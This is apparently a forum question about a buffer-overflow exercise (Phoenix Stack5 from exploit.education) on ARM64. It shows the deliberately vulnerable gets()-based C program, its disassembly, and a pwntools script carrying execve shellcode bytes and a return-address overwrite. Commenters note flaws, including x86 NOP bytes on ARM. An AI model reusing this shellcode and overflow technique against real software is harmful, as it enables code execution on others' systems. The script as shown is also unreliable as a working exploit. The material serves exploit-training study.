# zsh: broken pipe error(ARM64 buffer overflow exploit shellcode)

Tags: buffer-overflow, shellcode

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to  Phoenix Stack5 , brought to you by https://exploit.education"

char *gets(char *);

void start_level() {
  char buffer[128];
  gets(buffer);
}

int main(int argc, char **argv) {
  printf("%s\n", BANNER);
  start_level();
}
```

I am currently trying to exploit this. I know that I have to put the shellcode in the buffer, and set the return address(x30) to the address of the buffer.

This is the assembly code of start_level.

```
0x00000000004005e4 <+0>:    stp x29, x30, [sp, #-144]!
0x00000000004005e8 <+4>:    mov x29, sp
0x00000000004005ec <+8>:    add x0, sp, #0x10
0x00000000004005f0 <+12>:    bl 0x4004d0 <gets@plt>
0x00000000004005f4 <+16>:   nop
0x00000000004005f8 <+20>:   ldp x29, x30, [sp], #144
0x00000000004005fc <+24>:   ret
```

So I put a breakpoint at start_level+12(4005f0),ran it, and used 'print $sp+0x10' to find the buffer's address. It was 0xffffffffee80.
Also, I found out that there are 136bytes between the buffer and x30.(I will skip the process.) Based on the information I had, I made the following.(I didn't write the shellcode.)

```
from pwn import *
shellcode='\xe1\x45\x8c\xd2\x21\xcd\xad\xf2\xe1\x65\xce\xf2\x01\x0d\xe0\xf2\xe1\x8f\x1f\xf8\xe1\x03\x1f\xaa\xe2\x03\x1f\xaa\xe0\x63\x21\x8b\xa8\x1b\x80\xd2\xe1\x66\x02\xd4'


buf = ""
buf +='\x90'*16
buf += shellcode
buf += '\x90'*80
buf += '\x80\xee\xff\xff\xff\xff'
print(buf)
```

Then I did '(python3 solve5.py;cat) | /home/parallels/nnstack5'.

First it prints out the phrase(Welcome to  Phoenix Stack5 , brought to you by https://exploit.education).

Then when I type 'whoami' or 'id', the following occurs.

zsh: broken pipe         ( python3 solve5.py; cat; ) |

zsh: segmentation fault  /home/parallels/nnstack5

What could be wrong? Please help.

Comment: edit your question with how did you compile your program. Also are you sure that it's 136 bytes to the return address.

Comment: I compiled the program using the command gcc -z execstack -w -no-pie -o And I'm pretty sure it's 136 bytes because I saw the answers and they all had the same results.

Comment: You evidently know how to use a debugger, so why not use it to diagnose where and why the segfault occurs?

Comment: I used the -g option to compile the code, and ran it in gdb by using 'run <solve5.py' , and it says it exited normally. (solve5.py is the shellcode file.)

Comment: That will run it with your shellcode's *source* as input.  You probably want to do `solve5.py > shellcode.out` and then `run <shellcode.out`.

Comment: Btw, what's up with all the `0x90`s?  That's the nop instruction on x86, not on ARM.

Comment: You mean 'run' solve5.py > shellcode.out, right? I tried it and unfortunately got the same results. And can you tell me how to make a nop sled in ARM? Thanks.